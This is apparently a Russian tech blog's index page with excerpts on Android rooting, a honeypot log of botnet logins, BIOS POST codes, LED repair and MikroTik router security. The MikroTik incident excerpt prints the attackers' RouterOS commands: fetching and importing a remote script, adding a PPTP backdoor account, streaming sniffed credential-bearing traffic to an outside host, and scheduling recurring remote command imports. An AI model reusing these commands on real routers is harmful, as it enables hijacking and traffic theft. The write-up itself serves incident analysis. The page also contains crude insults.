MIUI 10 Root установка SUPERSU на Xiaomi redmi 4x

Разное в электронике
miui 10Не так давно вышла новая ОС ANDROID MIUI 10. Полсе установки многие хотят пойти дальше, например поудалять всякие муи гадости, удалить хром и гугл музыку и прочий встроенных хлам.
Но для этого нужет root uninstaller ну и сами права ROOT.

Для установки Root прав на MIUI 10 я использовал те же самые шаги что и на MIUI 9.

В принципе если Вы уже имеете установленный TWRP рекавери то можно прошить не только смартфон Xiaomi node 4x но и другой с MIUI 10, MIUI 9.

Читать дальше

Наивные ХАКЕРЫ или Тролим БОТНЕТ WANNAMINE

ХАЦКЕРЫ
haker pidor
На накенец-то дошли руки до того чтобы посмотреть зачем хакерам доступ к терминалу SSH и Telnet.
Запускаем на серваке ФЭЙКОВЫЙ терминал cowrie, даём кулхакеру подобрать пароль напимер admin и пароль Qwerty!
Ржом!
Большинство уродБотНетов делают одно и тоже.
Входят,
62.93.166.91] login attempt [b'nproc'/b'nproc'] succeeded

Узнают тип процессора
62.93.166.91] executing command «b'cat /proc/cpuinfo | grep name | wc -l'»
62.93.166.91] Command found: cat /proc/cpuinfo

ну и уходят.

Но попался наконец-то кулхацкер… айпишник этого говноря 58.240.92.50! Ещё и китайский конечно же.

Читать дальше

Расшифровка пост кодов биос AMI

POST карты
0 Code copying to specific areas is done/Passing control to INT 19h boot loader next.
3 Disable NMI, PIE, AIE, UEI, SQThe NMI is disabled. Next, checking for a soft reset or a power on condition
5 The BIOS stack has been built. Next, disabling cache mamory.
6 Uncompressing the POST code next.
7 Next, initializing the CPU data area
8 The CMOS checksum calculation is
10 Test DMA The keyboard controller command byte is written. Next, issuing the Pin 23 and 24 Blocking and unblocking command
11 Next, checking if «End» or «Ins» keys were pressed during power on. Initializing CMOS RAM in every boot AMIBIOS POST option was set in AMIBCP or the «End» key was pressed
12 Next, disabling DMA controllers 1 and 2 and interrupt controllers 1 and 2
13 The video display has been disabled. Port B has been initialized. Next, initializing the chipset
Читать дальше

Светодиод порога KE5431KA32S1 как отремонтировать самому?

РЕМОНТ и разборка
В ремонт попали фонари порога NISSAN MURANO,
Вроде чё там какае-то пластмасска с 4мя светодиодами. Но стоит этот светодиодный фонарик под 3 т.р.
СВЕТОИЗЛУЧАЮЩИЙ ДИОД KE5431KA32S1
Цены KE5431KA32S1
никаких аналогов? Китайских на али нет? Ужас
АХуЕРЕнеЛИ ЧТОЛИ?
2700рублей? ЗА ЭТУ СВИСТЮЛЬКУ?


Ну ладно будем чинить сами!
Читать дальше

После взлома микротик стал ПРОКСИ шпионом

Интернет
Следствия и Последствия взлома микротика
Недавно столкнулся с одним глюкующим микротиком, он стал терять пакеты и потерял управление по winbox.
Зайдя локально по мак адресу на устройство было видно то, что проц упёрт в 100%, фаервол соединений около 3000 штук, в логах только одна строчка. Порт винбокс поменяли.
Микротик с внешним айпишником и прошивкой 6.42.7
Ну ясно!
Микротик взломали!
Для начала вырубил webproxy на котором подсели сотки юзарей.
Вырубил носки.
и обратил внимание на правила в фаерволе и манглы.
О ужас! Этож открытый прокси сервер! Идёт перенаправление и перехват данных.
Во всех списках прокси листах он уже есть! ЁП!

В общем всё по порядку как это делали злодеи, ломатели микротиколв.
В терминале посмотрел последние комманды
/tool fetch url=http://47.96.89.95:8000/autosupout.rif;:delay 5;/im autosupout.rif;/file remove
[find name=autosupout.rif];:if ([:len [/ip pool find name=dodo]]=0) do={/ip pool add name=dodo range=100.64.0.1-1
00.64.254;/ppp pro add name=dodo copy-from=default-encryption local-address=100.64.0.0 remote-address=dodo;/ppp se
c add name=dodo pass=dodo profile=dodo;/in pptp-ser server set enabled=yes;/ip fi nat add chain=srcnat src-address
=100.64.0.0/16 action=masquerade}

/tool sniffer set streaming-server=37.1.207.114 streaming-enabled=yes
/tool sniffer set filter-interface=all filter-ip-protocol=tcp,udp filter-port=20,21,110,143,150
0,10000 

/system scheduler add name="CMD_OS" start-time="startup" interval="00:01:00" on-event="/tool fe
tch url=http://src-ip.com/cmd.txt mode=http dst-path=i113.rsc\r\n/import i113.rsc;:delay 6s;/file remove i113.rsc"


из последнего было ясно что запущена пачка комманд с ресурса src-ip.com/cmd.txt
код
Читать дальше

Дополнительная защита микротик, бан dude connect from (додики)

Интернет

denied winbox/dude connect from

— данное сообщение в логах микротика возникает тогда, когда кто-то пытается получить доступ через WINBOX, но его ip адрес не прописан в сервисе winboxa. Т.е. этот вероятный злоумышленник или робот пытается получить доступ, а доступа нет. С одной стороны не стоит сразу паниковать и думать что Вас ломают, но если лезут значит надо принимать меры ещё на шаг раньше.

После неоднократных взломов Микротика и постоянно образующихся новых дыр в безопасности устройства решил собрать список негодяев пытающихся заломиться через winbox несмотря на то что сервис открыт только для определённых ip адресов. Все эти негодяи попадают в логи с сообщениями
denied winbox/dude connect from

Читать дальше